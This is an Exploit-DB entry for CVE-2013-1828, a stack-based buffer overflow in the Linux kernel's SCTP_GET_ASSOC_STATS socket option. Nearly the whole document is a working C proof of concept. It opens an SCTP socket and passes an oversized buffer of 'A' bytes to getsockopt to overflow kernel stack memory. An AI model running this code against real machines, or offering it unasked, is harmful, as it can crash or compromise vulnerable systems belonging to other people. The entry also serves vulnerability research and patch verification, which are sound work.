Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow

EDB-ID: 24747 CVE: 2013-1828 OSVDB-ID: 91042
Verified: Author: Petr Matousek Published: 2013-03-13
Download Exploit: Source Raw Download Vulnerable App: N/A
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define SCTP_GET_ASSOC_STATS 112
#define SOL_SCTP 132

int main(void)
{
	char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	socklen_t len = strlen(buf);
	int fd;

	fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
	getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
	return 0;
}